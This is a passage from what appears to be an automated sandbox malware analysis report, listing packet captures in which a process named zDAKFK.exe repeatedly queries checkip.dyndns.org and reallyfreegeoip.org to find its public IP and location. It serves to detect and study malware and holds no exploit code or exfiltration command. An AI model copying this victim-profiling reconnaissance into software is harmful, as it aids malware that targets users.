                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 7, 2024 06:20:19.682492018 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:19 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 000205831b344b3340c3e6c5485d3328
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                                                    Nov 7, 2024 06:20:19.746239901 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 7, 2024 06:20:21.343811035 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:21 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: ab58bfb79de676d5416f067d0318b3c6
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                                                    Nov 7, 2024 06:20:22.474281073 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 7, 2024 06:20:23.160422087 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:23 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: f78f8a2d142e016fda5d17095e937e89
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                                                    Nov 7, 2024 06:20:23.206957102 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 7, 2024 06:20:26.561839104 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:26 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: afb7822e3d6d8657f1ebab661bbb0d69
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449765193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:27.344877005 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.449766193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:27.356549025 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.449767193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:27.369955063 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.449768193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:27.380649090 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.449769193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:27.393840075 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 7, 2024 06:20:29.053877115 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:28 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 59e1d7e4398915dc1d8865b570095956
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                                                    Nov 7, 2024 06:20:29.096179962 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 7, 2024 06:20:29.254576921 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:29 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: c35c0e29b7bfacd2b9397ec37bf1d9ad
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.449774193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:30.063080072 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.449775193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:30.074259043 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.449776193.122.130.0807556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 7, 2024 06:20:30.088620901 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 7, 2024 06:20:30.774023056 CET323INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:30 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: d9b755fcc8855c4eceb7c7775276c544
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449755188.114.97.34437556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-07 05:20:22 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-11-07 05:20:22 UTC1210INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdiRl7KppdK4WCSdwUr1u%2Bp4GnOJDA6OfgTibMZa5RZ25L%2B7c2CV6X1ILQo70riclhiEXobGAJtjLQEQ388CEMqQ%2F1XsBVWTU8LBnq5%2FBsFs3i1Zw0JCMX1ivsem2cJQ1A%2B0XOBK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfaa8c163462-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1039&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2698974&cwnd=248&unsent_bytes=0&cid=e29f22869a67f00b&ts=443&x=0"
                                                                                                                                                                    2024-11-07 05:20:22 UTC159INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</R
                                                                                                                                                                    2024-11-07 05:20:22 UTC200INData Raw: 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: egionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449764188.114.97.34437556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-07 05:20:27 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-11-07 05:20:27 UTC1209INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:27 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 5
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X7uBzLBBWVCzWgGeMkMET2nLipJeRInfYubA4pXUrM%2BdccXIEIQoo27ovNsf7neCdXay29qLT2lVmxYRK5T1vgPAZdKipq2jw4s4joTbPVG99GgEBgPdOrsWZYGuIlkoCUyhKmKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfca69447d57-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1986&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1456008&cwnd=251&unsent_bytes=0&cid=3be702fc48c990ba&ts=158&x=0"
                                                                                                                                                                    2024-11-07 05:20:27 UTC160INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</Re
                                                                                                                                                                    2024-11-07 05:20:27 UTC199INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: gionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449773188.114.97.34437556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-07 05:20:29 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-11-07 05:20:30 UTC1217INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:29 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 7
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuJvGBFQcxJboVkrA9AO0C731WJ8y4ed%2BiDyH4UnwotdguvWPYO1PICiYefr8bt6L0jR78ey7tab%2FZ7rw%2B%2FAsFDGVDs5Oq2LkpgXuXq9FoO7V%2BBDNT4Wgao5uf77aNwB7c3QYRMr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfdb4a914677-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2679000&cwnd=247&unsent_bytes=0&cid=13fc597fb45bae90&ts=149&x=0"
                                                                                                                                                                    2024-11-07 05:20:30 UTC152INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                                                                                                                                                    2024-11-07 05:20:30 UTC207INData Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.449778188.114.97.34437556C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-11-07 05:20:31 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-11-07 05:20:31 UTC1211INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:31 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 9
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
